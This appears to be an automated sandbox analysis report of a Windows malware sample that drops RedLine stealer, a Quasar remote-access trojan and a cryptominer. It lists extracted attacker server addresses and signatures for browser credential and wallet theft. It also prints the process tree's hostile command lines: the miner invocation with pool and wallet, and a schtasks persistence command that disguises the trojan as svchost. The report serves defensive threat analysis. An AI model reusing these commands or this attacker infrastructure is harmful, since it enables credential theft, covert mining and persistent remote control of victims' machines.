Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240730-en -
resource tags
arch:x64arch:x86image:win11-20240730-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-07-2024 00:22
Static task
static1
Behavioral task
behavioral1
Sample
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe
Resource
win10v2004-20240730-en
Behavioral task
behavioral2
Sample
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe
Resource
win11-20240730-en
General
-
Target
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe
-
Size
294KB
-
MD5
58ccb4c9da26dbf5584194406ee2f4b3
-
SHA1
ae91798532b747f410099ef7d0e36bffeca6361c
-
SHA256
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97
-
SHA512
dff6b4bf25fc5b5cf1a64ee645fb0310b072ec69c89a6e863cf9e0800e1d36f8dc4e567cf19c7dc8ac704d351b604cbf8d35959c3a64a10aa6b54f5c8fedb3c2
-
SSDEEP
6144:M3VPjut1s07wltS102nj9W0t3KMONuGfpul4EdSCM:gZjut1s0qQj9ztaMMdxop3M
Malware Config
Extracted
redline
exodusmarket.io
91.92.240.111:1334
Extracted
quasar
1.4.1
Office04
51.222.21.20:4782
374acc94-a8cd-45c6-bc31-752e0f83541d
-
encryption_key
5B2A5F50FABB3F6748116D7077D95758D0DFFC77
-
install_name
svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchost
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\adada.exe family_quasar behavioral2/memory/2344-300-0x0000000000CC0000-0x0000000000FE4000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3772-1-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3772-1-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
pureee.exeadada.exedropperrr.exepid process 5004 pureee.exe 2344 adada.exe 644 dropperrr.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exepureee.exedescription pid process target process PID 2068 set thread context of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 5004 set thread context of 2004 5004 pureee.exe AddInProcess.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exeRegAsm.exedropperrr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dropperrr.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
RegAsm.exepureee.exepid process 3772 RegAsm.exe 3772 RegAsm.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe 5004 pureee.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
RegAsm.exeadada.exepureee.exeAddInProcess.exedescription pid process Token: SeDebugPrivilege 3772 RegAsm.exe Token: SeDebugPrivilege 2344 adada.exe Token: SeDebugPrivilege 5004 pureee.exe Token: SeLockMemoryPrivilege 2004 AddInProcess.exe Token: SeLockMemoryPrivilege 2004 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AddInProcess.exepid process 2004 AddInProcess.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exeRegAsm.exeadada.exepureee.exedescription pid process target process PID 2068 wrote to memory of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 2068 wrote to memory of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 2068 wrote to memory of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 2068 wrote to memory of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 2068 wrote to memory of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 2068 wrote to memory of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 2068 wrote to memory of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 2068 wrote to memory of 3772 2068 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe RegAsm.exe PID 3772 wrote to memory of 5004 3772 RegAsm.exe pureee.exe PID 3772 wrote to memory of 5004 3772 RegAsm.exe pureee.exe PID 3772 wrote to memory of 2344 3772 RegAsm.exe adada.exe PID 3772 wrote to memory of 2344 3772 RegAsm.exe adada.exe PID 3772 wrote to memory of 644 3772 RegAsm.exe dropperrr.exe PID 3772 wrote to memory of 644 3772 RegAsm.exe dropperrr.exe PID 3772 wrote to memory of 644 3772 RegAsm.exe dropperrr.exe PID 2344 wrote to memory of 1528 2344 adada.exe schtasks.exe PID 2344 wrote to memory of 1528 2344 adada.exe schtasks.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe PID 5004 wrote to memory of 2004 5004 pureee.exe AddInProcess.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe"C:\Users\Admin\AppData\Local\Temp\2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Users\Admin\AppData\Local\Temp\pureee.exe"C:\Users\Admin\AppData\Local\Temp\pureee.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=504⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\adada.exe"C:\Users\Admin\AppData\Local\Temp\adada.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:644
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD59c682f5b5000cd003e76530706955a72
SHA11a69da76e05d114a317342dae3e9c7b10f107d43
SHA25636e6a3dd4bfc86c4e707f43cd9515707442d6c424b7661cb41766cfdca322522
SHA51233bd859542e1ae74d8c81427af44022cb91861dc02ee4202505f1e010487d06cb27e1aa83be6af17be4e2d8973289595b2ebe9bdf99a187956662df30b6dc88f
-
Filesize
476KB
MD535e7f1f850ca524d0eaa6522a4451834
SHA1e98db252a62c84fd87416d2ec347de46ec053ebd
SHA2562449fe334bbf8f09ff80422578a6c6961d20a0a456b214f6490c5ed1ae859c9e
SHA5123b013378a51a29652ff84f61050b344f504ef51a51944d469b1d0e629e4abad979416a56b9cffb6cfe20b80dfbebffec35dce6f5dc10b02907dee538f9f17a01
-
Filesize
662KB
MD50006ad7b9f2a9b304e5b3790f6f18807
SHA100db2c60fca8aec6b504dd8fd4861a2e59a21fe9
SHA256014d6c58dd7459c1664196ccd49b796f861d7d7e7e6c573bbb9cdc7cadc21450
SHA51231fcde22e25be698ef2efd44cc65b758e8c9e8b62504f3254f9cc44bfaabdaa0c94cefceac12833372f8b2797b6bd0205bb9c8f1626e25ee4117d886198fb7db
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
114KB
MD5d780b7995f84e5487be452d63157855b
SHA17df258685a42cb5cbff54aca7a8f347f16397ea6
SHA256cc4eb56ac9e6043d5476d834932ef8eb9cfd4abaabe88ed9f6afdc5b70d42619
SHA512d58077340001c6a1bd2b3280316a668c87e3dc8a4c7a1f8ff362bc29436ba4a214b3157474546b9876db2144fb4b570d6d7ef66d84481072996ef1760fe6fdb5
-
Filesize
46KB
MD514ccc9293153deacbb9a20ee8f6ff1b7
SHA146b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3
SHA2563195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511
SHA512916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765
-
Filesize
20KB
MD522be08f683bcc01d7a9799bbd2c10041
SHA12efb6041cf3d6e67970135e592569c76fc4c41de
SHA256451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457
SHA5120eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936
-
Filesize
112KB
MD587210e9e528a4ddb09c6b671937c79c6
SHA13c75314714619f5b55e25769e0985d497f0062f2
SHA256eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0
-
Filesize
96KB
MD540f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1d6582ba879235049134fa9a351ca8f0f785d8835
SHA256cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2